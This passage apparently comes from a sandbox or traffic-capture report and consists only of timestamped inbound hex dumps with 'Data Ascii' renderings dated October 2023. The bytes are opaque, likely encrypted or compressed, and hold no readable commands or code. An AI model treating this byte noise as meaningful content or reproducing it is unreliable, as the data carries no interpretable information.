ad 7b c8 f3 ae 62 98 f3 61 75 2a 76 d5 6a 87 6f 7c 02 8f ba fc cc 99 bc 7e 95 2d d2 2c fd 5a f2 a1 fa 4a d7 20 c1 0e b3 e8 b9 17 2e 2f 51 98 35 d2 c7 Data Ascii: ds>J0#ZAHW1x(Ptek3O7Qz9p-o^BT@(ZHEGe{/&&6IS7,~d}_/G<<vv<1!_z:6ZI:{bauvjo\|~-,ZJ ./Q5
2023-10-13 13:21:13 UTC	4200	IN	Data Raw: e2 1f f9 91 10 04 45 7d 71 0c 24 9d ae 5a b7 a7 a7 08 06 e4 1e c8 d8 cf c0 42 ce 9c 11 d3 81 32 05 d0 30 46 fa 0b 41 39 45 74 f2 c3 0a 64 40 80 8e e8 4e 66 78 75 7a 27 6e bc 86 d5 a9 84 2d 93 dd 6e 58 51 b1 3b 88 16 6e da 22 48 7b 1a 8c c5 a5 47 db c9 6b 58 90 d6 7b 16 d9 77 b4 b2 53 86 ed 51 fc c6 f3 03 5c 55 27 79 d0 35 b3 51 7f 34 18 00 31 43 f2 f2 51 8c 9e f2 8e b0 90 81 09 c2 66 68 8e 03 e7 bc 76 75 df 48 94 0d 7e 7e 3a 28 24 f0 8b a9 5e 96 0b c4 44 a4 42 84 49 f3 16 cd aa 5e f7 7e 8c 9a 77 03 8d 8c 89 a5 68 dc 35 a2 80 c6 6f 9d 4d 67 8f 61 d1 93 de c3 5e 1f 6a 63 e4 5f 02 63 d2 df 57 6a ff 74 35 b3 dd 87 a3 c9 7a 18 67 59 3f 69 13 e8 b5 e8 fe c4 c3 86 3e 59 7a 26 77 31 4d db b4 55 7f 50 75 b8 18 18 d6 d8 a5 86 a4 7a 73 1d ad 58 91 98 01 1b 3a 0c cc Data Ascii: E}q$ZB20FA9Etd@Nfxuz'n-nXQ;n"H{GkX{wSQ\U'y5Q41CQfhvuH~~:($^DBI^~wh5oMga^jc_cWjt5zgY?i>Yz&w1MUPuzsX:
2023-10-13 13:21:13 UTC	4216	IN	Data Raw: ea 25 77 16 24 44 23 a6 1f db a4 0c e0 a3 47 de 38 9b 67 1a 36 f0 c0 fb cc 1b ac 3a 3e fb ce 7c f2 05 1f ac 04 67 88 f0 e5 da c7 57 99 c6 19 e8 fd dd d4 e4 d5 c1 77 79 67 87 36 e9 c0 d1 17 e5 e5 d7 37 5c c9 92 9f 6c 34 71 3c 1e d6 d9 50 ce 6e 7f fb 70 fe ec d7 57 4f b9 e2 ae e9 d7 d8 5e 2d 3c a4 08 2b a8 b4 3a 3c 4f 3e 4c d5 3b a7 67 99 a9 3a d1 22 1b 21 4b a4 f8 58 73 b3 9a 85 90 b8 2f eb fd 31 46 57 ec 12 81 85 86 7d 25 2f 09 c1 01 0e dd d9 cf a6 59 ca 13 92 e5 f4 91 19 35 95 e5 c3 30 e0 a7 c0 4a 02 df 86 8d 71 88 b0 ab ff da 38 b0 1a 98 14 ab 1d dd d1 26 4c 8d e4 2f 95 35 b5 70 05 2f 38 df bd 04 bd 27 74 e0 e0 55 10 d2 da 42 d2 c0 af a5 53 e9 f9 d0 72 8a 58 34 3e 0f bf 57 55 56 9e c1 94 2f fc d6 a2 a5 bb 13 27 01 56 b5 db 6b f3 7a 1e 9b eb 07 4d 78 7a Data Ascii: %w$D#G8g6:>\|gWwyg67\l4q<PnpWO^-<+:<O>L;g:"!KXs/1FW}%/Y50Jq8&L/5p/8'tUBSrX4>WUV/'VkzMxz
2023-10-13 13:21:13 UTC	4232	IN	Data Raw: 19 af 4a e2 35 a8 17 47 9f da b7 ac f4 82 0d bc fa 95 d3 89 d1 df ad 68 7b 7a 57 99 30 d8 56 ea d1 67 98 d9 47 c4 05 15 62 4b ec d1 07 94 b7 05 d7 a5 26 00 4b 15 68 ef 72 ff 1b 22 21 f0 33 df 48 fd b3 63 46 42 be e1 87 be a7 18 2e 0d 52 2d 7e 14 da c2 d9 e9 56 2b 31 08 4f ba 01 fc 18 d9 a2 f0 cd d0 10 36 e5 cd 97 05 b4 64 71 12 3c b8 f8 94 94 88 6a 37 d7 9e 5a ba cf 07 52 cc 85 16 26 83 05 ea 7d 0c 9e 5a 78 87 00 a1 17 1d 29 c5 ac 22 5c 59 8d c9 93 1d 04 6d a5 55 78 e9 1b 8b db b3 6a b9 e4 78 e6 16 b1 f9 45 9c 37 dc 8e df ae 29 8a e8 4a d3 26 54 bb 7c 4a ce d8 39 98 64 ca dc 8f 85 37 dd fc fa 52 74 ae ac 46 2b b2 95 e8 ad 0b 11 e4 3f c9 6a ce 51 1a 39 f0 88 fa de b2 3d 4c bc 59 31 40 2e e7 e9 35 8d dd 83 21 19 c4 8c b0 c8 7d 00 e3 d5 c5 aa fa a0 f7 c0 bd Data Ascii: J5Gh{zW0VgGbK&Khr"!3HcFB.R-~V+1O6dq<j7ZR&}Zx)"\YmUxjxE7)J&T\|J9d7RtF+?jQ9=LY1@.5!}
2023-10-13 13:21:13 UTC	4248	IN	Data Raw: e0 82 66 0b ae 36 eb 3b fe 67 3a da ec dd 24 86 8c c3 5b ae 34 d9 07 41 88 2a 3a 84 ad e4 e0 af 0b a1 b8 2a 0d b9 55 a6 f8 20 fb 91 c8 dc a9 dd 7b 15 e0 99 24 f2 47 92 e3 a2 a1 b9 e9 5e a0 c0 31 e0 18 1e fd 57 7c 8b bf 93 ea 9d 1b b3 7a 7f 58 e5 d5 bb e2 2d 50 14 09 07 ac 79 29 1e 8f 97 24 b3 2d 5c a5 26 73 ea 09 ad a3 c5 06 38 e1 2f 10 54 a3 df 3c c3 6d 49 f3 f7 80 55 f3 54 7e 19 3d 74 0e 8d 03 81 6a e1 ce 82 61 1b 96 76 92 c9 08 5f 29 bf ab fb c1 35 64 ca 5c c8 e3 ea bf fc 33 9b f2 8e 00 ae e3 72 be bf 1f 2a b6 6b 67 92 14 f9 d6 8b b1 ad c3 0b a5 88 bf 95 fc 63 55 cc 4e 3c 64 55 26 0c e6 3b 83 34 21 d4 16 04 04 ed e2 ad 50 f4 95 60 32 5e cc 23 5c b4 0f 69 79 ec 12 ba 9b 54 7f 05 61 e2 4d 9c bb 2e c4 6f dc 42 1d 05 7c 85 04 18 83 63 f9 27 7b 47 3e 4c 22 Data Ascii: f6;g:$[4A:U {$G^1W\|zX-Py)$-\&s8/T<mIUT~=tjav_)5d\3r*kgcUN<dU&;4!P`2^#\iyTaM.oB\|c'{G>L"
2023-10-13 13:21:13 UTC	4264	IN	Data Raw: 34 e0 d8 c2 55 fe 81 18 36 8c 2b a2 ff dd 0b 52 51 a8 12 a6 84 60 68 91 8b dd 62 86 6f 76 d9 1c 08 66 3c 2e de d8 ef b6 6a cb e2 de 8d d2 5c 23 88 a1 39 68 b2 08 96 9e 46 a9 67 1f 67 df 6e 8f eb 11 f6 30 af e7 74 a1 ae 7d ca 79 28 15 d3 ac 15 09 8c 42 35 21 d3 79 75 c1 04 15 cd 54 ca 46 69 cf aa 2f db 8a 24 bf dc a8 46 e0 ec 9c 60 9f f1 df c1 34 60 0f c0 49 9a eb 1c 79 3c 87 41 41 03 9d 17 4c e8 8c 04 1c 4a f7 5a dc 59 58 3d d0 9b f6 5e 7f cc fa 46 25 a0 fb ec 14 de 41 77 2a 34 41 67 80 43 ab 51 f5 c2 5a 64 1d 2b 1a 89 2b c6 2f d2 97 c8 89 46 39 fd 96 ec 71 b1 f2 38 f2 bb 8f f0 b6 8b 63 f1 90 95 cd 6d 33 a2 5f 2a 0a 0b cd 2e 2d 8b d4 f1 a4 c8 e9 32 21 e0 76 c6 ba a1 30 31 e3 be 46 aa 92 9a fc ca f2 75 04 1e 45 de b6 66 e8 d2 25 f8 b0 08 3e 9d 9b a1 6d a8 Data Ascii: 4U6+RQ`hbovf<.j\#9hFggn0t}y(B5!yuTFi/$F`4`Iy<AALJZYX=^F%Aw4AgCQZd++/F9q8cm3_.-2!v01FuEf%>m
2023-10-13 13:21:13 UTC	4280	IN	Data Raw: 81 45 4e f4 f9 3c cc 60 b0 e4 54 3b 01 c5 32 24 34 5f e9 ec 54 e6 73 1c 8e 4e a2 fa 82 07 6e 4a f0 8c f6 ba 78 a9 96 98 14 ef 07 72 96 4b e5 05 a8 20 3b 8b 46 13 b1 6f 6b d6 f5 ed 51 f5 67 89 eb 84 67 ec b4 ef 60 c0 8b 26 48 f2 80 18 6e b9 57 db 90 35 d9 d3 02 d8 7c ae de 86 7b 1b f7 25 36 f0 a1 73 98 08 79 8c c6 9c 33 e2 cd 0c 9b 89 e6 70 43 b3 03 06 2a cd 75 e5 17 93 80 a2 06 c4 5c b8 b1 5b f4 36 25 cd ee b9 5a 3f cd c7 f7 01 70 4f b0 9a cf 8e 1a 6c 6e 23 fa bf 3e a1 07 15 ca 26 01 7b 51 18 40 1a d9 b7 f5 68 7f 9f 11 35 88 84 f6 94 ef 95 7f c5 ba b3 c3 35 7c 4d a7 80 d7 d6 a0 94 b9 04 0a 7a 01 c5 21 ae 4e 74 bb b2 56 48 0e 09 07 b1 cc fb bd 30 6f e3 c4 79 b4 0d 49 1c 6a 2f 1b 70 ce 03 2d 93 f6 13 93 6c 63 cb 19 50 e6 a4 78 43 d0 80 9b 86 29 e7 2d 2e df Data Ascii: EN<`T;2$4_TsNnJxrK ;FokQgg`&HnW5\|{%6sy3pC*u\[6%Z?pOln#>&{Q@h55\|Mz!NtVH0oyIj/p-lcPxC)-.
2023-10-13 13:21:13 UTC	4296	IN	Data Raw: 0d 93 13 f9 5c ad 9a c3 b0 d1 16 12 7e e9 dc 8f 9f 6a 0b 9a 5d 15 a4 c3 c2 6d 2b fa f2 fb 30 f4 53 db ff be e2 f0 5d b6 8e 80 e0 eb 03 d1 61 5e 13 19 4e 46 9e 91 14 a9 4d cf b0 e3 2c 13 d0 5d aa 7d 47 b8 40 33 83 04 a6 6a 8a a6 e5 de f6 ec 8b c8 9f 8f 28 bd 7e 9a 52 f8 39 dc a6 c4 7c 6d 9f f0 e5 df 75 53 f2 6a 80 3e 7c a0 e3 d9 f9 02 62 52 cf b0 3c 4a 60 70 ed 75 67 0e 80 61 99 e9 ae b1 27 c0 e3 ff 75 6b 52 af b1 05 95 d4 33 98 91 7c 96 f6 cf ac 6f be e6 4c d0 09 69 7f 8e d8 2d c0 ed bf af c2 48 06 b3 eb 21 42 f1 c8 ee 26 46 c2 84 94 bc 76 fc 73 5b 33 c1 cb 24 e1 bc e4 c8 11 af 48 7f 02 33 ae 6d a2 5f 94 bf db d2 52 ea b3 b3 79 50 ea 16 47 fc cb 0a 3e 43 9b 87 06 4f 4f 29 da da d4 18 98 9c c4 e8 a2 2f af 6f 06 31 94 14 2c c3 1a 01 ee f3 a4 e0 39 97 61 75 Data Ascii: \~j]m+0S]a^NFM,]}G@3j(~R9\|muSj>\|bR<J`puga'ukR3\|oLi-H!B&Fvs[3$H3m_RyPG>COO)/o1,9au
2023-10-13 13:21:13 UTC	4312	IN	Data Raw: 38 7a d2 94 cf 4f cd f6 85 74 84 6f f5 f4 be 45 c5 b1 8d f8 1b 19 f1 8d da 15 d2 72 28 36 6b 4b df 9b bf f8 f2 76 4d 43 4d 5e 28 d1 f7 58 b9 49 bc 91 e0 0e 06 72 80 7e 3e d3 36 a6 c8 e5 74 14 07 77 db 9d 55 06 68 52 a7 a1 d1 bb 69 66 b3 06 16 a2 f4 a9 ef b0 36 d8 3d fb 9c c5 e6 84 35 8f 55 d4 7b 33 62 58 82 4f 10 3b 89 96 c3 38 9b 63 ba 8c c2 07 9a 53 a6 b5 68 3e c9 34 2b e3 52 d0 e7 30 45 48 88 63 5a 87 59 9f d0 e8 a5 94 5c 9b 9b c9 ef 16 24 cf f4 bc f8 22 a9 d8 00 21 a9 70 4b 4d 2d 2f e9 b6 be ee a8 bf 2b 4b 78 0f 33 43 95 af 00 35 fe da 2b ef d9 76 ab 8b c3 23 22 00 ad 84 5c 96 c2 7a 4f bb 58 d7 71 f1 47 a3 c0 6e c2 27 b1 24 89 1f fa 36 64 49 b1 5b ba 79 d7 43 55 43 57 f4 23 b3 41 2a 5b 9d 19 d7 b3 c5 54 94 fc 8f 87 ff 0d ca 17 3d a2 bf 57 61 39 7c 3e Data Ascii: 8zOtoEr(6kKvMCM^(XIr~>6twUhRif6=5U{3bXO;8cSh>4+R0EHcZY\$"!pKM-/+Kx3C5+v#"\zOXqGn'$6dI[yCUCW#A*[T=Wa9\|>
2023-10-13 13:21:13 UTC	4328	IN	Data Raw: 72 3e fd 1e a5 1e c1 55 16 e7 fc 67 fd 45 2b bf 1b 04 31 9d d5 c0 50 d3 56 1e 77 67 34 fc 85 7a 87 4c cf 24 40 2f 9e 55 71 37 ec fe 35 c3 50 c7 26 60 14 d6 2c dc 06 27 71 f8 11 06 30 6e 7b bb 4e 4b f3 8b a4 00 e9 64 80 04 49 74 8f 9a be 96 ac 07 af c1 1b 84 d9 51 7e 7c b1 2b ce 6c 29 e3 4d 0b 2a c9 35 ae 83 49 01 60 5b d6 8f d0 29 b0 2f ae 88 27 aa bd 52 2a 03 f5 52 fc 56 03 8a 52 83 70 e8 f1 76 c0 a7 37 f6 6d 61 d9 fb f0 00 2b 5a b0 fb 5e 97 91 8e 92 86 f6 13 03 51 0f 7e 56 e5 53 6d d1 9d ee 25 e0 af 22 65 a3 71 33 ff ee 0a a5 da 4c f9 4e 8b 18 5e 67 3f 97 47 35 ab 29 64 6d 58 f0 d4 b9 8a c0 5c fa c9 20 b1 d8 70 51 cf ab 34 b5 86 1f 4e b1 91 47 b5 42 ab 4a f8 1b a2 f8 bd fe 87 5d 26 ed c2 93 8a ca 8f 9a b1 60 68 f6 0d 6b 74 1f 90 f1 6f e7 1c 33 eb d6 05 Data Ascii: r>UgE+1PVwg4zL$@/Uq75P&`,'q0n{NKdItQ~\|+l)M5I`[)/'RRVRpv7ma+Z^Q~VSm%"eq3LN^g?G5)dmX\ pQ4NGBJ]&`hkto3
2023-10-13 13:21:13 UTC	4344	IN	Data Raw: 0e 27 6f e7 de 62 c1 c0 04 c9 4a 74 51 6a 60 64 41 07 38 69 5f 2b f4 85 93 00 8b 6e 18 46 3a 9f 3d 20 35 ca 27 dc 65 c8 64 d8 c8 8b db d2 db 37 12 3f a8 6c d8 a7 cf 73 69 94 41 81 7c 4d 6c d4 7a 21 77 e5 7f 4c 99 f9 80 c7 59 ec 5e 72 38 98 33 08 3a b1 8e db 04 3f cd cc 0d 8d 21 49 01 2a 2d de ff 94 2e a1 29 b1 4a 20 a1 14 7e f9 9e 3e 11 53 21 14 c0 dd 22 de 28 37 a4 ce b1 38 c9 83 4d 9a ad 37 98 e4 29 87 db 2f d2 50 30 56 8d 6d da 47 e8 2d ea 05 d4 c8 19 78 d4 4b 74 03 26 ec a4 d1 af eb c3 33 b9 60 1e cb 13 bd 7f e9 54 dc 5a 4e 11 76 53 83 50 4b ec 43 48 3e 85 bf fc ed ec 80 d9 78 6f cd 15 44 c9 fd 35 5a e1 c4 79 9c 60 70 da d7 20 21 64 52 2f d6 ef ad d8 62 e3 5a b7 9c 06 a9 86 fd 35 1b 39 80 15 17 66 6f c2 71 fd cb ca 14 aa 58 90 f2 60 4d 20 94 6f ff a6 Data Ascii: 'obJtQj`dA8i_+nF:= 5'ed7?lsiA\|Mlz!wLY^r83:?!I*-.)J ~>S!"(78M7)/P0VmG-xKt&3`TZNvSPKCH>xoD5Zy`p !dR/bZ59foqX`M o
2023-10-13 13:21:13 UTC	4360	IN	Data Raw: 6e b0 f5 43 08 87 b8 65 ad c7 59 08 63 50 7d fb f0 ed fb 43 d7 cc 0f d5 16 72 dc 0d 19 82 44 53 16 9e be b1 8f e6 ca e0 d9 2c f4 38 9d 0d d6 fa 93 81 6e cc f4 67 6f 7f aa 71 06 fe 48 31 e6 3a 59 6b b1 db da d9 d8 73 5f 60 0d c7 31 e5 d1 dc 5c 97 e6 dd 78 d6 e7 cc 33 be 5c a9 39 93 cf d8 80 98 4d 1e aa d8 db af c6 74 66 82 cb f1 aa 0a b3 e6 af b6 12 30 f5 97 72 eb f4 c9 7c d0 ee 61 ed 1b 19 04 3c 71 36 c6 bb d0 a2 81 e3 82 6d 30 02 53 eb 39 49 da aa 08 de 14 d7 6b 0d 61 b2 32 e9 e5 59 38 c9 0e ed 07 1f 1a da 1a 04 bb 74 54 e6 7b 05 52 c0 4a 77 88 73 b3 30 2e a0 f6 8c 3a 9c 4d db 91 8e bc 3a dd 2c 1c ea ab e4 69 0e 5f c7 44 5d c4 a7 f9 a9 f1 fa fe d7 ad 4e c2 2c 2a 98 ff 53 62 84 1e dd ff dd c6 2a e8 f8 83 51 b9 d0 34 23 26 1c 0e c7 02 f8 8d 3f 75 62 1f 3e Data Ascii: nCeYcP}CrDS,8ngoqH1:Yks_`1\x3\9Mtf0r\|a<q6m0S9Ika2Y8tT{RJws0.:M:,i_D]N,SbQ4#&?ub>
2023-10-13 13:21:13 UTC	4376	IN	Data Raw: ad ca 8c 8d 57 fd 9a b6 09 6b 04 91 b2 7c 12 3f 8b a9 8e 52 cb 2e 9a b4 37 02 3d 2d 6b 57 e3 3d 77 f5 8e 1e 32 37 23 58 09 3f 13 15 2a e4 23 03 cb 7b 07 5a 77 de 50 94 f7 b5 b9 0d b5 f1 7d f7 f0 fa 56 ed 71 77 cf 2f f0 e5 02 e5 08 be b9 d0 7a cc d4 32 77 09 cc a4 e5 ae 4f 1f 73 79 f8 ad 96 87 5d cd 05 7e 23 15 6c bc e6 33 2c 43 7d 6b c7 a9 5d 18 fb 85 f1 8a 89 d4 dd 0c d0 26 4c 5c 59 38 f8 13 7c a6 a7 44 55 17 40 36 37 a1 fd 91 e1 6f c7 26 fb 64 fd a1 c8 c7 77 ab 8b 97 11 8f 3c e9 3d a1 cc 78 6c 46 ac 9d e7 a5 86 06 e6 b3 a6 bf a2 a2 12 0a 83 2c 26 fd 74 ae 18 aa 19 0d 0b 6f bc 6e f2 28 73 47 a7 9d 07 3f 48 2b 94 97 b3 22 54 36 22 16 89 ee 65 45 a5 a9 da 40 b6 b1 d6 8e 07 7d f6 4c 1b 5d 6d 09 7d 7a 21 e2 a0 23 af 59 1c 41 ab c5 b1 98 20 6f b9 0d 30 e7 3f Data Ascii: Wk\|?R.7=-kW=w27#X?*#{ZwP}Vqw/z2wOsy]~#l3,C}k]&L\Y8\|DU@67o&dw<=xlF,&ton(sG?H+"T6"eE@}L]m}z!#YA o0?
2023-10-13 13:21:13 UTC	4392	IN	Data Raw: b6 ee 10 de 93 58 3e 07 1a 0e 32 76 e2 7c 6c 93 a7 d0 33 1b 80 7f 0e 82 cc 2e b6 35 a3 f3 d8 e0 0c 44 3c 4c 13 42 c2 db f1 bc ac 3b 5d 1a 83 7b 0b 71 3d 1d 18 b8 85 88 bc 46 8b 04 30 83 79 c2 12 b7 5a 14 63 c8 00 be 14 e7 08 e3 83 1c 35 a9 63 3f 7e f6 21 88 77 ae ab 78 bb 45 4d ba e2 9f 67 a2 1c 38 c2 94 4a 86 6b 93 ce 34 2d 2d 65 fd f0 fc 12 19 1f 84 f9 85 d7 17 73 cf 6f 86 55 85 29 86 71 05 1c 47 2a 0a fa 65 88 6d da a5 80 cb e1 78 47 d4 d1 fd 26 88 47 b8 35 0f a7 94 a2 27 ae 6f 24 6b ca 10 d2 98 ce 86 81 c1 59 85 42 2e d1 8d 57 ff 49 ef 03 0a 13 27 67 87 61 4f ce 72 1c 36 fc 15 f3 5f 4f e6 32 c9 5f fc 32 87 a5 aa da ba 56 71 e2 38 b5 15 8e 17 3b c2 6c 40 3c 56 37 78 28 66 29 17 01 09 13 c6 65 88 01 39 33 d2 3a 18 c2 ef 09 a1 c5 70 19 44 69 69 44 54 3f Data Ascii: X>2v\|l3.5D<LB;]{q=F0yZc5c?~!wxEMg8Jk4--esoU)qG*emxG&G5'o$kYB.WI'gaOr6_O2_2Vq8;l@<V7x(f)e93:pDiiDT?
2023-10-13 13:21:13 UTC	4408	IN	Data Raw: 31 d4 9d b6 c9 89 e8 dc ed 1e d0 5d df c8 76 6e 03 45 75 dd 21 8b 1d 88 1a 39 1c 70 17 d2 29 c0 f9 ac d9 29 7f 2c 75 9c 4f e2 29 09 44 f5 b0 d1 69 80 a6 bc cf 1c e7 7e 07 7e bc 7b e7 d2 3e 20 ff 97 e8 6e 72 b8 d5 70 fe dd ca 3a 54 e3 a9 bf 74 7d 6a fc 53 8b ab 0f 78 62 b2 a1 6a 45 51 4a ce 30 7d 88 a6 68 d2 a6 85 20 83 f5 5e 79 2e 93 32 ee 84 f2 0b f7 f8 fb 84 b2 bb 1d 27 ce b0 8c 8e e5 37 86 fb 39 63 87 1d 0b 39 e1 7e 5c 03 13 99 3d 49 5c a2 e2 bb 14 70 47 9d 09 f4 20 0c 70 5e ff 66 76 ee 69 a4 a5 ee 4c af 89 49 e9 af 64 fa 1e fb eb a9 8e cb 4f 9e bc 72 94 84 12 b7 04 c8 8d d0 22 a7 82 c4 73 d6 78 99 18 c6 1b 34 91 41 5d 2b 91 4f 9e c2 43 c5 bb 1b 95 17 d1 d6 91 16 83 26 b2 91 70 7d 27 2a ad 14 08 94 b4 dd 9f 97 be 30 cf da 32 b3 ac d8 67 3b 28 85 69 e5 Data Ascii: 1]vnEu!9p)),uO)Di~~{> nrp:Tt}jSxbjEQJ0}h ^y.2'79c9~\=I\pG p^fviLIdOr"sx4A]+OC&p}'*02g;(i
2023-10-13 13:21:13 UTC	4424	IN	Data Raw: 1a 71 b1 8d 87 aa 51 82 a1 59 d2 e6 99 2f 7c 7c 40 35 31 3d cf 66 fb d7 dc cb f9 28 e9 07 d2 e4 32 75 e0 82 83 dc 36 e1 18 bd 48 2d a1 b6 d8 8f 6d d8 2f f6 74 57 62 96 03 86 01 6a 36 e9 e9 bd b9 12 80 e7 4b 4c 15 63 8b d5 4e 59 5c a9 e4 f2 f0 ff be 32 45 f6 e0 bf 06 6d e6 50 d3 ad 79 c3 55 62 dd 68 12 20 c2 26 00 a9 72 71 ff 9a 03 0e 1f 3d c0 d0 3b 4d 1e 36 6e c9 3d e4 8a 01 bd a4 7e 1d e1 30 38 52 aa e2 89 c5 35 aa 53 b6 ac 54 71 b7 ef 4c 4b 02 0d 12 86 ac 10 81 8b ae f4 54 20 18 1d 91 0e 05 64 ad 8d 56 fc cd 77 de 8f 7f 1b 47 67 cb 2e 24 a8 fa 8f eb 99 8e 34 71 b3 94 52 63 2f c6 88 0a 7d 0f be bc 14 b6 55 d3 6a c3 ad 70 37 23 04 47 cc 36 bc ee 0c 74 a5 88 1a ee 51 ff bc 94 60 d9 17 7d d6 f2 cc b1 62 95 bc 14 f3 1f 13 65 06 3a ea ff f4 70 c1 8a bc ac 87 Data Ascii: qQY/\|\|@51=f(2u6H-m/tWbj6KLcNY\2EmPyUbh &rq=;M6n=~08R5STqLKT dVwGg.$4qRc/}Ujp7#G6tQ`}be:p
2023-10-13 13:21:13 UTC	4440	IN	Data Raw: 11 8c 6c 09 39 ac 90 75 d7 38 be 1d f7 4b 83 b0 fa a5 1b 29 a0 12 86 9e b8 82 29 a4 82 98 70 84 d0 32 78 57 4c ce 9f 24 b2 6b 85 af cf c1 e6 8f 1c 65 78 ec 8d 1a 3d bb d4 a7 a6 f6 6e 69 09 78 6e a7 af ba b6 8c 79 39 7f 98 35 aa 7c e0 17 7e 87 d1 08 3f 64 2d f2 50 12 94 8a 11 34 de d6 f1 34 c5 4d 4c 5d ef c4 a8 7c 24 ee db 6f 00 eb 7c 60 51 14 a9 1d 54 98 26 0b ee 01 98 e7 4f 43 36 d4 c9 d5 b2 cb e8 f2 24 6b c9 df b2 01 4b 71 d5 83 37 6e cd f5 ca c7 7f a4 aa b5 b5 79 83 a0 df ab 1e e5 6d e6 ae 84 33 09 54 8e 08 99 df 64 0f 2f 9e 2e ac e2 64 0d b7 2b 61 38 ac 16 8d 19 d1 f3 1d 71 e1 91 ea 09 8a ae 74 11 99 8c 1e 24 12 b3 1d 89 3e 21 83 e9 d3 41 64 3f 2c 75 91 7a 7a a4 14 9f ae 66 18 68 55 8c 73 3d 63 46 ea 34 03 ca 04 22 06 bd 71 00 2d 0a cf f1 a1 c3 c6 57 Data Ascii: l9u8K))p2xWL$kex=nixny95\|~?d-P44ML]\|$o\|`QT&OC6$kKq7nym3Td/.d+a8qt$>!Ad?,uzzfhUs=cF4"q-W
2023-10-13 13:21:13 UTC	4456	IN	Data Raw: 86 46 eb 8f e8 a8 cd df 03 51 d6 a0 8a 88 87 1f f0 c8 81 5d 6f 1f dc 98 6d 08 6c 0b 9a 84 37 a1 31 0c 69 a9 25 ca 95 ca 74 3b 1b 2a fc 6f 63 47 0c 72 4f 1b 40 ee 32 ac 56 26 65 8b d6 91 f6 c1 7e 80 b5 3e 7d 63 e9 ef ea 5c 5e 8b 02 fa 86 85 4c 2f 97 af 27 bd ce 70 78 35 d2 d1 31 31 5b 1d fd 3f 8b e1 ef 80 94 ef 50 c4 e6 c5 59 54 e6 31 18 92 f0 11 48 0c 46 8c af 3b b9 70 66 96 31 36 df ac d4 64 94 40 f8 58 e6 b3 3a 7b 72 d2 a0 2f 73 68 9d e0 c3 b2 38 8d 6f 2b 8c 11 89 8b 4a 3a 1c 0c 18 df 81 51 76 47 13 be 43 7e 9a 82 d8 2a 4e f1 44 b6 93 d2 81 d3 fa e2 c6 e1 4d 2f ce 37 27 ff 0c 36 04 d9 f8 6c d7 04 db 72 a6 c9 5a 1a bc d6 3e 4c 6b 37 23 f3 83 77 28 c8 77 ff ea 0a 23 db 88 6b 62 45 93 14 ad e5 0e d4 ec 56 6e 58 4c 4b 49 77 0a 61 0c 32 ba ad 0f 99 f9 6b 4f Data Ascii: FQ]oml71i%t;ocGrO@2V&e~>}c\^L/'px511[?PYT1HF;pf16d@X:{r/sh8o+J:QvGC~NDM/7'6lrZ>Lk7#w(w#kbEVnXLKIwa2kO
2023-10-13 13:21:13 UTC	4472	IN	Data Raw: b7 1e d2 bc 56 da f6 c3 1b ee 5d 04 ea 3c a5 6f 71 c0 ec 9c 90 4b 53 95 8b d1 7e ef 09 39 d4 a6 53 42 5b 8c 77 e7 31 40 42 83 a3 9d c9 50 bd ee 53 93 9a 40 01 8f 92 dc 78 21 55 09 f2 7d 42 aa 00 de ba fe 8e 05 2a c5 16 ef 3e 8a f1 1e 81 fc 3f c4 cf 63 58 36 ec 4b fe f7 b2 6c a1 54 e3 f0 de 05 a5 d0 77 3f 01 b8 a3 df ce b8 d4 8d 6e b3 2f fa 6d 8a 3c b0 56 a2 af 0e 0d f1 2e ca e7 c2 83 84 f5 ab a4 64 ec 16 bd 16 85 4a 8c 9a 37 e4 6e d3 84 a6 e1 6f e3 c5 cc 07 b7 5e c9 77 25 d7 17 13 7a 21 2a e2 de 9d 0f 88 12 b7 11 e6 bb 45 e6 c5 26 6d 0e 56 4b 6d 5f 77 ff ed 73 f9 b9 c3 b3 06 5c 5e 83 f2 59 6b 77 c3 96 d1 8f c5 56 76 2e 41 e0 c2 4f 7c c8 a8 40 02 3f ef 70 5f fa 60 c8 1a b7 92 a3 ae 94 f2 88 ee 1e 16 d1 fa 3d 39 4b fa 82 33 06 ce 5b 02 ce 59 19 2a 72 89 fb Data Ascii: V]<oqKS~9SB[w1@BPS@x!U}B>?cX6KlTw?n/m<V.dJ7no^w%z!E&mVKm_ws\^YkwVv.AO\|@?p_`=9K3[Y*r
2023-10-13 13:21:13 UTC	4488	IN	Data Raw: 56 62 52 fb 08 77 0f d8 52 4a 2a a8 1d 58 dd 16 eb a8 79 d4 84 51 cd 05 66 61 58 59 e2 72 bb 31 4b fa 29 3d 10 e6 cc 60 31 13 f7 02 5b de ce 42 da d5 ad e5 5e 5d 3a c9 8f f2 6f 24 f2 09 d1 93 22 39 99 0e 10 4c 44 06 37 d9 ab e6 90 66 fc e7 a4 36 47 ad 67 4e 9f ce 2f d7 38 e7 b0 d9 18 90 9e 93 3a c7 6a 78 47 5f 7b 89 e5 55 13 73 c1 38 0d be 9c 4d 36 5c b8 8c cd 82 b4 9f cb 11 ef 73 26 4a ca 16 ca a3 ee f5 d5 fd 68 94 f0 8a 28 76 cd 46 e1 46 b4 cb a4 88 56 bc 6f 68 c6 a5 32 09 e4 8e 34 31 0c c9 16 a3 e6 e5 b1 3e c1 6c 46 16 4e 13 d3 ac 05 2e 25 4b 28 f8 29 fb 15 7f e4 6f 85 79 df fc 80 4a 2a e7 46 84 71 e0 5c ed fb 0d 69 49 0e 4c 0c 84 be 33 75 be 5a 8b 55 ea 84 67 43 24 47 2c 70 6e 44 c2 af d7 96 18 10 84 27 e3 bb da 68 1b 8a cc a0 2f 23 8b a4 9d 4b 83 b8 Data Ascii: VbRwRJXyQfaXYr1K)=`1[B^]:o$"9LD7f6GgN/8:jxG_{Us8M6\s&Jh(vFFVoh241>lFN.%K()oyJFq\iIL3uZUgC$G,pnD'h/#K
2023-10-13 13:21:13 UTC	4504	IN	Data Raw: e4 8f de ad 26 fb 1a aa 9a 90 0e ce ca e5 d8 31 3e 11 89 62 e0 21 47 84 31 cf 21 18 f3 6a 5b 22 e9 09 a4 87 ef 2e eb 3d 55 23 07 4b a9 10 f1 42 a3 29 24 7d e1 f0 06 96 a6 14 9d 19 e1 84 fe ec a5 d8 c0 43 47 b4 bc 55 97 54 6f ec 29 84 8b f1 52 d9 c7 44 e8 6c c6 47 22 93 2c fa b6 e4 c4 02 32 3b 1e bd 36 68 26 0f 53 0f 00 ba 99 6f e6 e9 c7 08 f3 32 fe f0 cd 9e c6 a7 1d ef 89 6b 06 88 aa 45 dc c7 39 77 63 7b b1 25 47 84 2e f3 f3 40 ac d1 d7 8c 87 c2 cc d2 9e 43 88 69 d6 75 7e b3 4f 0a 6a 35 59 76 4f a8 34 ab 02 1d 2f 3c c2 f8 73 96 2d 6d 10 ed 66 5f 39 eb 92 97 